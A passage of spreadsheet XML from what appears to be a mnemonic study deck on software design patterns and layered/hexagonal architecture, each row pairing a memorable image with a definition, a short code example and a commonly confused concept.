      <c r="B628" t="inlineStr">
        <is>
          <t>626</t>
        </is>
      </c>
      <c r="C628" t="inlineStr">
        <is>
          <t>Null object</t>
        </is>
      </c>
      <c r="D628" t="inlineStr">
        <is>
          <t>A cardboard-cutout security guard propped by the door: patrol() does nothing at all, but nobody ever trips over an empty guard post.</t>
        </is>
      </c>
      <c r="E628" t="inlineStr">
        <is>
          <t>A do-nothing implementation of an interface used in place of null, removing repetitive null checks from clients.</t>
        </is>
      </c>
      <c r="F628" t="inlineStr">
        <is>
          <t>class NullLogger { log(msg) {} }; return Collections.emptyList() not null</t>
        </is>
      </c>
      <c r="G628" t="inlineStr">
        <is>
          <t>Optional/Maybe — Optional forces callers to CHECK for presence; a null object silently absorbs calls with safe defaults.</t>
        </is>
      </c>
      <c r="H628" t="inlineStr">
        <is>
          <t>Scarecrow — rejected, scarecrows actively scare, cutouts do nothing.</t>
        </is>
      </c>
      <c r="J628" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K628" t="inlineStr">
        <is>
          <t>Behavioral patterns I</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" t="n">
        <v>0</v>
      </c>
      <c r="B629" t="inlineStr">
        <is>
          <t>627</t>
        </is>
      </c>
      <c r="C629" t="inlineStr">
        <is>
          <t>Command-based undo/redo</t>
        </is>
      </c>
      <c r="D629" t="inlineStr">
        <is>
          <t>Pancakes stack up as you type; Ctrl+Z peels the top pancake and un-fries it back into batter, while the redo plate waits to re-fry it.</t>
        </is>
      </c>
      <c r="E629" t="inlineStr">
        <is>
          <t>Executed commands are pushed onto a stack; undo pops and reverses them (or restores mementos), redo replays from a second stack.</t>
        </is>
      </c>
      <c r="F629" t="inlineStr">
        <is>
          <t>undoStack.push(cmd); undo(): c = undoStack.pop(); c.unexecute(); redoStack.push(c)</t>
        </is>
      </c>
      <c r="G629" t="inlineStr">
        <is>
          <t>Event sourcing — undo stacks are session-local UI history; event sourcing is the persisted system of record.</t>
        </is>
      </c>
      <c r="H629" t="inlineStr">
        <is>
          <t>Rewinding a cassette — rejected, tape rewind is continuous, not discrete pops.</t>
        </is>
      </c>
      <c r="J629" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K629" t="inlineStr">
        <is>
          <t>Behavioral patterns I</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" t="n">
        <v>0</v>
      </c>
      <c r="B630" t="inlineStr">
        <is>
          <t>628</t>
        </is>
      </c>
      <c r="C630" t="inlineStr">
        <is>
          <t>Lapsed listener problem</t>
        </is>
      </c>
      <c r="D630" t="inlineStr">
        <is>
          <t>The lighthouse keeps ringing doorbells of houses whose owners moved out years ago — the copper wires (references) alone hold the empty houses up.</t>
        </is>
      </c>
      <c r="E630" t="inlineStr">
        <is>
          <t>Observers that never unsubscribe stay strongly referenced by the subject, causing memory leaks and ghost notifications.</t>
        </is>
      </c>
      <c r="F630" t="inlineStr">
        <is>
          <t>Fix: removeEventListener on teardown; or WeakReference listener lists</t>
        </is>
      </c>
      <c r="G630" t="inlineStr">
        <is>
          <t>Generic memory leak — here the SUBJECT holds the reference, so 'unused' observers are uncollectable and still receive events.</t>
        </is>
      </c>
      <c r="H630" t="inlineStr">
        <is>
          <t>Zombie mailing list — rejected, wires-holding-houses is more visual.</t>
        </is>
      </c>
      <c r="J630" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K630" t="inlineStr">
        <is>
          <t>Behavioral patterns I</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" t="n">
        <v>0</v>
      </c>
      <c r="B631" t="inlineStr">
        <is>
          <t>629</t>
        </is>
      </c>
      <c r="C631" t="inlineStr">
        <is>
          <t>Strategy as first-class function</t>
        </is>
      </c>
      <c r="D631" t="inlineStr">
        <is>
          <t>The golf caddie is fired and replaced by a single floating glove: no bag, no clubs, you just hand over the bare hand — the function itself.</t>
        </is>
      </c>
      <c r="E631" t="inlineStr">
        <is>
          <t>In languages with first-class functions, a bare lambda replaces the one-method strategy class — same pattern, no ceremony.</t>
        </is>
      </c>
      <c r="F631" t="inlineStr">
        <is>
          <t>sorted(xs, key=lambda x: x.age) instead of writing an AgeComparator class</t>
        </is>
      </c>
      <c r="G631" t="inlineStr">
        <is>
          <t>'The pattern disappeared' — the intent (pluggable algorithm) remains; only the class boilerplate evaporated.</t>
        </is>
      </c>
      <c r="H631" t="inlineStr">
        <is>
          <t>Naked chef without a restaurant — rejected as noise.</t>
        </is>
      </c>
      <c r="J631" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K631" t="inlineStr">
        <is>
          <t>Behavioral patterns I</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" t="n">
        <v>0</v>
      </c>
      <c r="B632" t="inlineStr">
        <is>
          <t>630</t>
        </is>
      </c>
      <c r="C632" t="inlineStr">
        <is>
          <t>Iterator</t>
        </is>
      </c>
      <c r="D632" t="inlineStr">
        <is>
          <t>A museum audio-guide wand: press NEXT and it leads you room by room in order — you never see the curator's storage maps or basement shelving.</t>
        </is>
      </c>
      <c r="E632" t="inlineStr">
        <is>
          <t>Provides sequential access to a collection's elements through a standard cursor interface without exposing internal structure.</t>
        </is>
      </c>
      <c r="F632" t="inlineStr">
        <is>
          <t>for x in xs uses __iter__/__next__; Java it.hasNext()/it.next()</t>
        </is>
      </c>
      <c r="G632" t="inlineStr">
        <is>
          <t>Iterable — the iterable is the collection that VENDS iterators; the iterator is the one-use cursor itself.</t>
        </is>
      </c>
      <c r="H632" t="inlineStr">
        <is>
          <t>Pez dispenser — rejected, cute but destroys the collection as it goes.</t>
        </is>
      </c>
      <c r="J632" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K632" t="inlineStr">
        <is>
          <t>Behavioral patterns II</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" t="n">
        <v>0</v>
      </c>
      <c r="B633" t="inlineStr">
        <is>
          <t>631</t>
        </is>
      </c>
      <c r="C633" t="inlineStr">
        <is>
          <t>Template method</t>
        </is>
      </c>
      <c r="D633" t="inlineStr">
        <is>
          <t>A Mad Libs card: the plot is printed in permanent ink; subclasses may only scribble words into the blanks, then the card reads itself aloud.</t>
        </is>
      </c>
      <c r="E633" t="inlineStr">
        <is>
          <t>A base-class method fixes an algorithm's skeleton and defers specific steps to subclass hook overrides.</t>
        </is>
      </c>
      <c r="F633" t="inlineStr">
        <is>
          <t>JUnit setUp()/test/tearDown(); HttpServlet.service() dispatching to your doGet()</t>
        </is>
      </c>
      <c r="G633" t="inlineStr">
        <is>
          <t>Strategy — template method varies steps via INHERITANCE, fixed at compile time; strategy swaps whole algorithms via composition at runtime.</t>
        </is>
      </c>
      <c r="H633" t="inlineStr">
        <is>
          <t>Paint-by-numbers — rejected, blanks-in-a-story encodes hooks better.</t>
        </is>
      </c>
      <c r="J633" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K633" t="inlineStr">
        <is>
          <t>Behavioral patterns II</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" t="n">
        <v>0</v>
      </c>
      <c r="B634" t="inlineStr">
        <is>
          <t>632</t>
        </is>
      </c>
      <c r="C634" t="inlineStr">
        <is>
          <t>Visitor</t>
        </is>
      </c>
      <c r="D634" t="inlineStr">
        <is>
          <t>A tax inspector walking a village: each house opens its OWN door (accept), and the inspector whips out exactly the right form for that house type.</t>
        </is>
      </c>
      <c r="E634" t="inlineStr">
        <is>
          <t>Moves an operation out of a stable object structure into a visitor object; elements call accept(v) which calls back v.visitX(this).</t>
        </is>
      </c>
      <c r="F634" t="inlineStr">
        <is>
          <t>ast.accept(prettyPrinter); compiler passes: TypeCheckVisitor, CodeGenVisitor</t>
        </is>
      </c>
      <c r="G634" t="inlineStr">
        <is>
          <t>Iterator — iterator merely walks the elements; visitor dispatches type-specific operations via double dispatch.</t>
        </is>
      </c>
      <c r="H634" t="inlineStr">
        <is>
          <t>Door-to-door salesman — rejected, sells one thing to all types.</t>
        </is>
      </c>
      <c r="J634" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K634" t="inlineStr">
        <is>
          <t>Behavioral patterns II</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" t="n">
        <v>0</v>
      </c>
      <c r="B635" t="inlineStr">
        <is>
          <t>633</t>
        </is>
      </c>
      <c r="C635" t="inlineStr">
        <is>
          <t>Mediator</t>
        </is>
      </c>
      <c r="D635" t="inlineStr">
        <is>
          <t>An air-traffic control tower: planes never radio each other directly — every 'may I land?' routes through the tower, or metal rains from the sky.</t>
        </is>
      </c>
      <c r="E635" t="inlineStr">
        <is>
          <t>Centralizes many-to-many communication: colleagues talk only to a mediator hub, which coordinates who reacts and how.</t>
        </is>
      </c>
      <c r="F635" t="inlineStr">
        <is>
          <t>ChatRoom.send(msg, from) routes to members; dialog controller coordinating widgets</t>
        </is>
      </c>
      <c r="G635" t="inlineStr">
        <is>
          <t>Observer — observer broadcasts one-to-many blindly; mediator encodes explicit pairwise coordination LOGIC inside the hub.</t>
        </is>
      </c>
      <c r="H635" t="inlineStr">
        <is>
          <t>Switchboard operator — rejected, ATC adds the crash consequence.</t>
        </is>
      </c>
      <c r="J635" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K635" t="inlineStr">
        <is>
          <t>Behavioral patterns II</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" t="n">
        <v>0</v>
      </c>
      <c r="B636" t="inlineStr">
        <is>
          <t>634</t>
        </is>
      </c>
      <c r="C636" t="inlineStr">
        <is>
          <t>Chain of responsibility</t>
        </is>
      </c>
      <c r="D636" t="inlineStr">
        <is>
          <t>An office complaint slip climbing desks: the intern shrugs and passes it up, the manager shrugs — the slip crawls upward until someone finally stamps it.</t>
        </is>
      </c>
      <c r="E636" t="inlineStr">
        <is>
          <t>Passes a request along a linked chain of handlers; each one either handles it or forwards it to the next.</t>
        </is>
      </c>
      <c r="F636" t="inlineStr">
        <is>
          <t>Express middleware fn(req, res, next); Java servlet filter chains</t>
        </is>
      </c>
      <c r="G636" t="inlineStr">
        <is>
          <t>Decorator — same wrapping shape, but decorators ALL run to add behavior; chain handlers may short-circuit and one 'owns' the request.</t>
        </is>
      </c>
      <c r="H636" t="inlineStr">
        <is>
          <t>Hot potato — rejected, potato holders never actually handle it.</t>
        </is>
      </c>
      <c r="J636" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K636" t="inlineStr">
        <is>
          <t>Behavioral patterns II</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" t="n">
        <v>0</v>
      </c>
      <c r="B637" t="inlineStr">
        <is>
          <t>635</t>
        </is>
      </c>
      <c r="C637" t="inlineStr">
        <is>
          <t>Interpreter</t>
        </is>
      </c>
      <c r="D637" t="inlineStr">
        <is>
          <t>A tiny UN inside your program: one translator booth per grammar rule; a sentence passes booth to booth down the parse tree until meaning drips out the bottom.</t>
        </is>
      </c>
      <c r="E637" t="inlineStr">
        <is>
          <t>Represents each grammar rule as a class and evaluates sentences by walking the resulting syntax tree.</t>
        </is>
      </c>
      <c r="F637" t="inlineStr">
        <is>
          <t>regex engines; SQL WHERE-clause evaluators; expr.interpret(context)</t>
        </is>
      </c>
      <c r="G637" t="inlineStr">
        <is>
          <t>Visitor on an AST — interpreter puts eval() IN the node classes; visitor extracts operations out of them.</t>
        </is>
      </c>
      <c r="H637" t="inlineStr">
        <is>
          <t>Rosetta stone — rejected, static artifact, no per-rule machinery.</t>
        </is>
      </c>
      <c r="J637" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K637" t="inlineStr">
        <is>
          <t>Behavioral patterns II</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" t="n">
        <v>0</v>
      </c>
      <c r="B638" t="inlineStr">
        <is>
          <t>636</t>
        </is>
      </c>
      <c r="C638" t="inlineStr">
        <is>
          <t>Fluent interface</t>
        </is>
      </c>
      <c r="D638" t="inlineStr">
        <is>
          <t>A sommelier sliding one glass down the bar through a chain of stations that each add a note - the same glass keeps traveling, collecting flavor, until someone finally drinks it (executes).</t>
        </is>
      </c>
      <c r="E638" t="inlineStr">
        <is>
          <t>Methods return the receiver (or builder) so calls chain into a readable sentence that executes at the end.</t>
        </is>
      </c>
      <c r="F638" t="inlineStr">
        <is>
          <t>QueryBuilder().select('id').where('age &gt; 21').limit(10).run()</t>
        </is>
      </c>
      <c r="G638" t="inlineStr">
        <is>
          <t>vs builder pattern (603): builder is about assembling a complex product; fluent chaining is the SYNTAX builders often wear</t>
        </is>
      </c>
      <c r="H638" t="inlineStr">
        <is>
          <t>domino line of method calls</t>
        </is>
      </c>
      <c r="J638" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K638" t="inlineStr">
        <is>
          <t>Behavioral patterns II</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" t="n">
        <v>0</v>
      </c>
      <c r="B639" t="inlineStr">
        <is>
          <t>637</t>
        </is>
      </c>
      <c r="C639" t="inlineStr">
        <is>
          <t>Hollywood principle</t>
        </is>
      </c>
      <c r="D639" t="inlineStr">
        <is>
          <t>A casting agent snatches your headshot at the door: 'We'll call YOU.' Months later the phone rings with your one scene — the hook method.</t>
        </is>
      </c>
      <c r="E639" t="inlineStr">
        <is>
          <t>'Don't call us, we'll call you': frameworks and template skeletons invoke your code at the right moment; you never drive their control flow.</t>
        </is>
      </c>
      <c r="F639" t="inlineStr">
        <is>
          <t>React calls your render(); Spring calls your @Bean methods; you never call the framework's main loop</t>
        </is>
      </c>
      <c r="G639" t="inlineStr">
        <is>
          <t>Dependency inversion principle — DIP concerns which ABSTRACTION you depend on; Hollywood concerns who holds control FLOW.</t>
        </is>
      </c>
      <c r="H639" t="inlineStr">
        <is>
          <t>Butler who forbids entering the kitchen — rejected, casting call is the name.</t>
        </is>
      </c>
      <c r="J639" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K639" t="inlineStr">
        <is>
          <t>Behavioral patterns II</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" t="n">
        <v>0</v>
      </c>
      <c r="B640" t="inlineStr">
        <is>
          <t>638</t>
        </is>
      </c>
      <c r="C640" t="inlineStr">
        <is>
          <t>Internal vs external iterator</t>
        </is>
      </c>
      <c r="D640" t="inlineStr">
        <is>
          <t>Museum two ways: grip the audio-wand and press NEXT yourself, or slump into the tram that drives past every exhibit while you just hand it your eyes (callback).</t>
        </is>
      </c>
      <c r="E640" t="inlineStr">
        <is>
          <t>External iterators let the client pull items with next(); internal iterators take a callback and the collection drives the loop.</t>
        </is>
      </c>
      <c r="F640" t="inlineStr">
        <is>
          <t>it.next() (external) vs xs.forEach(f) / xs.map(f) (internal)</t>
        </is>
      </c>
      <c r="G640" t="inlineStr">
        <is>
          <t>Push vs pull streams — same duality: external is pull (client paces), internal is push (producer paces).</t>
        </is>
      </c>
      <c r="H640" t="inlineStr">
        <is>
          <t>Buffet vs waiter service — rejected, tram ride is more distinctive.</t>
        </is>
      </c>
      <c r="J640" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K640" t="inlineStr">
        <is>
          <t>Behavioral patterns II</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" t="n">
        <v>0</v>
      </c>
      <c r="B641" t="inlineStr">
        <is>
          <t>639</t>
        </is>
      </c>
      <c r="C641" t="inlineStr">
        <is>
          <t>Pattern overuse</t>
        </is>
      </c>
      <c r="D641" t="inlineStr">
        <is>
          <t>A knight in five stacked suits of armor clanking off to fetch tea — AbstractTeaFactoryVisitorProxy — who can no longer bend his arm enough to pour.</t>
        </is>
      </c>
      <c r="E641" t="inlineStr">
        <is>
          <t>Applying patterns speculatively adds indirection without need; reach for one only when its specific force is actually present.</t>
        </is>
      </c>
      <c r="F641" t="inlineStr">
        <is>
          <t>One if/else beats a Strategy hierarchy for two stable cases</t>
        </is>
      </c>
      <c r="G641" t="inlineStr">
        <is>
          <t>YAGNI — YAGNI rejects unneeded FEATURES; patternitis is unneeded STRUCTURE around features you do need.</t>
        </is>
      </c>
      <c r="H641" t="inlineStr">
        <is>
          <t>Wrapping a single grape in six gift boxes — kept as backup image.</t>
        </is>
      </c>
      <c r="J641" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K641" t="inlineStr">
        <is>
          <t>Behavioral patterns II</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" t="n">
        <v>0</v>
      </c>
      <c r="B642" t="inlineStr">
        <is>
          <t>640</t>
        </is>
      </c>
      <c r="C642" t="inlineStr">
        <is>
          <t>Layered architecture</t>
        </is>
      </c>
      <c r="D642" t="inlineStr">
        <is>
          <t>A wedding cake you may only eat top-down: each tier rests squarely on the tier beneath and never, ever licks upward.</t>
        </is>
      </c>
      <c r="E642" t="inlineStr">
        <is>
          <t>Organizes code into horizontal layers (UI, application, domain, data) where each layer depends only on those below it.</t>
        </is>
      </c>
      <c r="F642" t="inlineStr">
        <is>
          <t>Controller -&gt; Service -&gt; Repository -&gt; Database</t>
        </is>
      </c>
      <c r="G642" t="inlineStr">
        <is>
          <t>Hexagonal — layered stacks dependencies downward toward the DB; hexagonal points everything inward toward the domain.</t>
        </is>
      </c>
      <c r="H642" t="inlineStr">
        <is>
          <t>Geological strata — rejected, no image of the no-upward-calls rule.</t>
        </is>
      </c>
      <c r="J642" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K642" t="inlineStr">
        <is>
          <t>Layered &amp; hexagonal architecture</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" t="n">
        <v>0</v>
      </c>
      <c r="B643" t="inlineStr">
        <is>
          <t>641</t>
        </is>
      </c>
      <c r="C643" t="inlineStr">
        <is>
          <t>Hexagonal architecture</t>
        </is>
      </c>
      <c r="D643" t="inlineStr">
        <is>
          <t>A queen bee in the center cell of a honeycomb: each of the six waxed walls has a socket, and worker bees plug tools in from outside — the queen never leaves.</t>
        </is>
      </c>
      <c r="E643" t="inlineStr">
        <is>
          <t>Puts the domain core at the center behind ports; adapters at the edges translate between the core and every external technology.</t>
        </is>
      </c>
      <c r="F643" t="inlineStr">
        <is>
          <t>Core defines OrderRepository port; PostgresOrderRepository adapter plugs in from outside</t>
        </is>
      </c>
      <c r="G643" t="inlineStr">
        <is>
          <t>Layered — hexagonal is symmetric (DB and UI are both mere adapters); layered treats the database as the special bottom.</t>
        </is>
      </c>
      <c r="H643" t="inlineStr">
        <is>
          <t>Castle with six gates — bees chosen to bind to domain 6's hexagon mnemonic.</t>
        </is>
      </c>
      <c r="J643" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K643" t="inlineStr">
        <is>
          <t>Layered &amp; hexagonal architecture</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" t="n">
        <v>0</v>
      </c>
      <c r="B644" t="inlineStr">
        <is>
          <t>642</t>
        </is>
      </c>
      <c r="C644" t="inlineStr">
        <is>
          <t>Port</t>
        </is>
      </c>
      <c r="D644" t="inlineStr">
        <is>
          <t>USB sockets molded into the honeycomb's wax walls: the hive dictates each socket's shape, and any gadget arriving from outside must match the hole.</t>
        </is>
      </c>
      <c r="E644" t="inlineStr">
        <is>
          <t>A technology-neutral interface owned by the core that declares what the application needs or offers — the socket, not the plug.</t>
        </is>
      </c>
      <c r="F644" t="inlineStr">
        <is>
          <t>interface PaymentGateway { charge(amount) } — declared inside the domain module</t>
        </is>
      </c>
      <c r="G644" t="inlineStr">
        <is>
          <t>Adapter — the port is the interface defined inside the core; the adapter is the implementation living outside it.</t>
        </is>
      </c>
      <c r="H644" t="inlineStr">
        <is>
          <t>Ship's harbor — rejected, harbors receive anything, sockets enforce shape.</t>
        </is>
      </c>
      <c r="J644" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K644" t="inlineStr">
        <is>
          <t>Layered &amp; hexagonal architecture</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" t="n">
        <v>0</v>
      </c>
      <c r="B645" t="inlineStr">
        <is>
          <t>643</t>
        </is>
      </c>
      <c r="C645" t="inlineStr">
        <is>
          <t>Driving vs driven adapters</t>
        </is>
      </c>
      <c r="D645" t="inlineStr">
        <is>
          <t>Left wall of the honeycomb: woodpeckers hammering requests IN. Right wall: the hive's own tubes squirting honey OUT into jars. Same walls, opposite arrows.</t>
        </is>
      </c>
      <c r="E645" t="inlineStr">
        <is>
          <t>Driving (primary) adapters call INTO the core — HTTP controllers, CLIs; driven (secondary) adapters are called BY the core — DB, mail.</t>
        </is>
      </c>
      <c r="F645" t="inlineStr">
        <is>
          <t>REST controller -&gt; core (driving); core -&gt; SmtpMailer (driven)</t>
        </is>
      </c>
      <c r="G645" t="inlineStr">
        <is>
          <t>GoF Adapter — here 'adapter' means any tech-specific edge component, not interface conversion per se.</t>
        </is>
      </c>
      <c r="H645" t="inlineStr">
        <is>
          <t>Mouth vs tail of a fish — rejected, arrows on one wall each are clearer.</t>
        </is>
      </c>
      <c r="J645" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K645" t="inlineStr">
        <is>
          <t>Layered &amp; hexagonal architecture</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" t="n">
        <v>0</v>
      </c>
      <c r="B646" t="inlineStr">
        <is>
          <t>644</t>
        </is>
      </c>
      <c r="C646" t="inlineStr">
        <is>
          <t>Clean/onion architecture</t>
        </is>
      </c>
      <c r="D646" t="inlineStr">
        <is>
          <t>An onion whose core never cries: knives, tears, and supermarket stickers stay on the outer skins; the center ring has never even smelled a fridge (framework).</t>
        </is>
      </c>
      <c r="E646" t="inlineStr">
        <is>
          <t>Concentric rings — entities, use cases, interface adapters, frameworks — with all source dependencies pointing inward toward the domain.</t>
        </is>
      </c>
      <c r="F646" t="inlineStr">
        <is>
          <t>UseCase imports Entity; Controller imports UseCase; never the reverse</t>
        </is>
      </c>
      <c r="G646" t="inlineStr">
        <is>
          <t>Hexagonal — same spirit; clean/onion prescribe named rings, hexagonal just says core-plus-ports. All obey 'point inward'.</t>
        </is>
      </c>
      <c r="H646" t="inlineStr">
        <is>
          <t>Tree rings — rejected, tree rings grow outward historically, wrong direction.</t>
        </is>
      </c>
      <c r="J646" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K646" t="inlineStr">
        <is>
          <t>Layered &amp; hexagonal architecture</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" t="n">
        <v>0</v>
      </c>
      <c r="B647" t="inlineStr">
        <is>
          <t>645</t>
        </is>
      </c>
      <c r="C647" t="inlineStr">
        <is>
          <t>Dependency rule</t>
        </is>
      </c>
      <c r="D647" t="inlineStr">
        <is>
          <t>A one-way pilgrimage road spiraling into a mountain shrine: carts roll inward only, and the monks inside have never once heard the market's name.</t>
        </is>
      </c>
      <c r="E647" t="inlineStr">
        <is>
          <t>Source-code dependencies may only point inward: inner circles know nothing — not even names — of anything in outer circles.</t>
        </is>
      </c>
      <c r="F647" t="inlineStr">
        <is>
          <t>Domain never imports Spring, HTTP, or SQL; outer code implements domain-owned interfaces</t>
        </is>
      </c>
      <c r="G647" t="inlineStr">
        <is>
          <t>Dependency inversion principle — DIP is the class-level technique; the dependency rule is the architecture-wide policy it enforces.</t>
        </is>
      </c>
      <c r="H647" t="inlineStr">
        <is>
          <t>Whirlpool — rejected, whirlpools pull objects in, code must not flow.</t>
        </is>
      </c>
      <c r="J647" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K647" t="inlineStr">
        <is>
          <t>Layered &amp; hexagonal architecture</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" t="n">
        <v>0</v>
      </c>
      <c r="B648" t="inlineStr">
        <is>
          <t>646</t>
        </is>
      </c>
      <c r="C648" t="inlineStr">
        <is>
          <t>Anti-corruption layer</t>
        </is>
      </c>
      <c r="D648" t="inlineStr">
        <is>
          <t>A decontamination airlock between your gleaming lab and a rusty factory: every crate gets unpacked, scrubbed, and repacked into YOUR containers before entering.</t>
        </is>
      </c>
      <c r="E648" t="inlineStr">
        <is>
          <t>A translating boundary that converts a legacy or external model into your own, so foreign concepts never leak into your domain.</t>
        </is>
      </c>
      <c r="F648" t="inlineStr">
        <is>
          <t>LegacyCrmClient -&gt; AclTranslator -&gt; Customer (your model, your terms)</t>
        </is>
      </c>
      <c r="G648" t="inlineStr">
        <is>
          <t>Plain adapter — an ACL translates whole MODELS and semantics between contexts, not just one interface's method signatures.</t>
        </is>
      </c>
      <c r="H648" t="inlineStr">
        <is>
          <t>Customs checkpoint — rejected, customs inspects but does not repackage.</t>
        </is>
      </c>
      <c r="J648" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K648" t="inlineStr">
        <is>
          <t>Layered &amp; hexagonal architecture</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" t="n">
        <v>0</v>
      </c>
      <c r="B649" t="inlineStr">
        <is>
          <t>647</t>
        </is>
      </c>
      <c r="C649" t="inlineStr">
        <is>
          <t>Framework-free domain</t>
        </is>
      </c>
      <c r="D649" t="inlineStr">
        <is>
          <t>A monk copying scripture with a feather quill while gadget salesmen pound on the monastery door — the manuscripts calmly outlive every gadget fad.</t>
        </is>
      </c>
      <c r="E649" t="inlineStr">
        <is>
          <t>Keep entities and business rules in plain objects with zero framework imports, so the core outlives and ignores infrastructure churn.</t>
        </is>
      </c>
      <c r="F649" t="inlineStr">
        <is>
          <t>Domain layer: no @Entity, no HttpRequest — pure classes and functions only</t>
        </is>
      </c>
      <c r="G649" t="inlineStr">
        <is>
          <t>'No frameworks anywhere' — frameworks are fine in OUTER rings; the rule bans them only from the domain core.</t>
        </is>
      </c>
      <c r="H649" t="inlineStr">
        <is>
          <t>Off-grid cabin — rejected, monk-vs-salesmen adds the churn outside.</t>
        </is>
      </c>
      <c r="J649" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K649" t="inlineStr">
        <is>
          <t>Layered &amp; hexagonal architecture</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" t="n">
        <v>0</v>
      </c>
      <c r="B650" t="inlineStr">
        <is>
          <t>648</t>
        </is>
      </c>
      <c r="C650" t="inlineStr">
        <is>
          <t>Strict vs relaxed layering</t>
        </is>
      </c>
      <c r="D650" t="inlineStr">
        <is>
          <t>Two office towers: in one, the elevator only ever descends a single floor per ride (strict); in the other you may plunge straight from penthouse to basement archives.</t>
        </is>
      </c>
      <c r="E650" t="inlineStr">
        <is>
          <t>Strict layering lets a layer call only the layer directly beneath it; relaxed layering permits skipping layers downward for pragmatism.</t>
        </is>
      </c>
      <c r="F650" t="inlineStr">
        <is>
          <t>Controller calling Repository directly = relaxed layering (skips Service)</t>
        </is>
      </c>
      <c r="G650" t="inlineStr">
        <is>
          <t>Layer violation — skipping DOWNWARD can be sanctioned policy; any upward dependency is always a violation.</t>
        </is>
      </c>
      <c r="H650" t="inlineStr">
        <is>
          <t>Ladder vs fire pole — kept as a backup pair.</t>
        </is>
      </c>
      <c r="J650" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K650" t="inlineStr">
        <is>
          <t>Layered &amp; hexagonal architecture</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" t="n">
        <v>0</v>
      </c>
      <c r="B651" t="inlineStr">
        <is>
          <t>649</t>
        </is>
      </c>
      <c r="C651" t="inlineStr">
        <is>
          <t>Layers vs tiers</t>
        </is>
      </c>
      <c r="D651" t="inlineStr">
        <is>
          <t>Wedding cake vs wedding venues: one cake's sponge tiers (layers) can all sit on a single table, or be couriered to three different cities (tiers).</t>
        </is>
      </c>
      <c r="E651" t="inlineStr">
        <is>
          <t>Layers are logical separations within a codebase; tiers are physical deployment units — a 3-layer app can run on a single tier.</t>
        </is>
      </c>
      <c r="F651" t="inlineStr">
        <is>
          <t>Django app (3 layers) on one server = 1 tier; move DB to its own host = 2 tiers</t>
        </is>
      </c>
      <c r="G651" t="inlineStr">
        <is>
          <t>N-tier marketing speak — count machines for tiers, count module boundaries for layers.</t>
        </is>
      </c>
      <c r="H651" t="inlineStr">
        <is>
          <t>Org chart vs office buildings — rejected, cake ties back to 640.</t>
        </is>
      </c>
      <c r="J651" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K651" t="inlineStr">
        <is>
          <t>Layered &amp; hexagonal architecture</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" t="n">
        <v>0</v>
      </c>
      <c r="B652" t="inlineStr">
        <is>
          <t>650</t>
        </is>
      </c>
      <c r="C652" t="inlineStr">
        <is>
          <t>Module boundary</t>
        </is>
      </c>
      <c r="D652" t="inlineStr">
        <is>
          <t>Castle walls with one guarded gate: merchants trade only at the gate's counter, and whatever chaos brews inside the walls never crosses the moat.</t>
        </is>
      </c>
      <c r="E652" t="inlineStr">
        <is>
          <t>A module hides its internals behind a small public interface; the boundary is where the contract lives and change stops propagating.</t>
        </is>
